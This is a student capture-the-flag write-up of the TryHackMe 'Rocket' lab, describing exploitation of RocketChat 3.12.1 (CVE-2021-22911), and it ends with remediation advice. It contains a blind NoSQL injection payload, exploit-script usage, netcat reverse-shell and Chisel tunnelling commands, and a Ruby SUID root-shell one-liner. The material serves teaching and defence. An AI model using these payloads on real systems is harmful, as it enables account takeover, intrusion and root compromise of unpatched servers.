Ethical Hacking: Concepts & Practices - Final Project Report
A comprehensive penetration testing writeup for the Rocket vulnerable machine on TryHackMe, demonstrating exploitation of RocketChat 3.12.1 via NoSQL injection (CVE-2021-22911).
| Name |
|---|
| Hasnain Akhtar |
| Shayan Ahmed |
| Bilal Raza |
- Overview
- Vulnerabilities Exploited
- Attack Chain
- Tools Used
- Exploit Scripts
- Usage
- Detailed Methodology
- Remediation
- References
This repository contains the exploit scripts and detailed report for compromising the "Rocket" machine on TryHackMe. The target system runs RocketChat version 3.12.1, which contains multiple critical vulnerabilities including NoSQL injection and authentication bypass flaws.
- ✅ Full administrative access to RocketChat
- ✅ Remote Code Execution (RCE) via malicious webhook integration
- ✅ Container escape and pivoting to host system
- ✅ Root-level privilege escalation via SUID binary exploitation
- ✅ Capture of both user and root flags
| Severity | Vulnerability | CVE |
|---|---|---|
| Critical | NoSQL Injection in Password Reset | CVE-2021-22911 |
| Critical | Authentication Bypass | CVE-2021-22911 |
| Critical | SUID Binary Exploitation (Ruby) | - |
| High | Bolt CMS File Upload | - |
| High | Weak/Default Credentials | - |
- CVSS Score: 9.8 (Critical)
- Affected Versions: RocketChat < 3.13, 3.12.x < 3.12.2, 3.11.x < 3.11.3
- Attack Vector: Network-based, no authentication required
- Impact: Complete system compromise through blind NoSQL injection in the password reset functionality
┌─────────────────────────────────────────────────────────────────────────┐
│ ATTACK FLOW │
├─────────────────────────────────────────────────────────────────────────┤
│ │
│ 1. Reconnaissance │
│ └── Port Scan → Discover RocketChat on port 80 │
│ │
│ 2. NoSQL Injection (CVE-2021-22911) │
│ └── Trigger password reset → Extract token via regex injection │
│ │
│ 3. Admin Account Takeover │
│ └── Reset admin password using extracted token │
│ │
│ 4. Remote Code Execution │
│ └── Create malicious webhook integration → Trigger reverse shell │
│ │
│ 5. Container Escape │
│ └── Chisel tunneling → Pivot to host via Bolt CMS │
│ │
│ 6. Privilege Escalation │
│ └── Ruby SUID exploitation → Root access │
│ │
└─────────────────────────────────────────────────────────────────────────┘
| Category | Tools |
|---|---|
| Scanning | Nmap, WhatWeb, Gobuster |
| Exploitation | Custom Python exploits, Netcat |
| Post-Exploitation | LinPEAS, Chisel, ProxyChains |
| Credential Cracking | John the Ripper |
| Database | MongoDB CLI |
The primary exploit script that automates the full attack chain:
python3 detailed_exploit.py -u <low_priv_email> -a <admin_email> -t <target_url> -i <attacker_ip> -p <port>Features:
- Automated password reset token extraction via blind NoSQL injection
- Admin password reset
- Webhook-based RCE for reverse shell
An alternative exploit with hardcoded configuration and additional 2FA bypass capabilities:
# Edit the configuration variables at the top of the script
python3 cve_exploit.pyFeatures:
- 2FA secret extraction (if enabled)
- TOTP code generation for 2FA bypass
- More verbose output for debugging
# Install required Python packages
pip3 install requests pyotp
# For machines with 2FA enabled
pip3 install pyotp-
Connect to TryHackMe VPN:
sudo openvpn <your_vpn_file>.ovpn
-
Add target to hosts file:
echo "<TARGET_IP> rocket.thm" | sudo tee -a /etc/hosts echo "<TARGET_IP> chat.rocket.thm" | sudo tee -a /etc/hosts
- Navigate to
http://chat.rocket.thm - Register a new account (use a temporary email service)
- Note down the email address
nc -lvnp 4444python3 detailed_exploit.py \
-u [email protected] \
-a [email protected] \
-t http://chat.rocket.thm \
-i <YOUR_ATTACKER_IP> \
-p 4444Once you receive the reverse shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg# Port scanning
nmap -sC -sV -p 22,80 -oN nmap_detailed.txt <TARGET_IP>
# Web fingerprinting
whatweb http://rocket.thm
# Directory enumeration
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txtThe NoSQL injection vulnerability exists in the getPasswordPolicy endpoint. By using regex-based blind injection, we can extract the password reset token character by character:
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}'Container Escape via Chisel:
# On attacker machine
./chisel server -p 8000 --reverse -v
# On victim (container)
./chisel client <ATTACKER_IP>:8000 R:8081:172.17.0.4:8081Privilege Escalation via Ruby SUID:
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Exploit Ruby SUID
/usr/bin/ruby2.5 -e 'Process::Sys.setuid(0); exec "/bin/bash"'| Priority | Action |
|---|---|
| Critical | Update RocketChat to version 3.18+ |
| Critical | Patch NoSQL injection vulnerabilities |
| High | Review and restrict SUID binaries |
| High | Implement strong password policies |
| Medium | Enable WAF and rate limiting |
| Medium | Implement network segmentation |
| Low | Deploy comprehensive logging/SIEM |
- TryHackMe - Rocket Room
- CVE-2021-22911 - MITRE
- OWASP - NoSQL Injection
- GTFOBins - Ruby
- Chisel - TCP/UDP Tunnel
- LinPEAS - Privilege Escalation
This writeup is for educational purposes only. The techniques demonstrated should only be used in authorized penetration testing engagements or on platforms like TryHackMe where explicit permission is granted. Unauthorized access to computer systems is illegal.
This project is licensed under the MIT License - see the report PDF for full documentation. The pdf however if used shall be properly cited and mentioned with the repo name.
Happy Hacking! 🎯
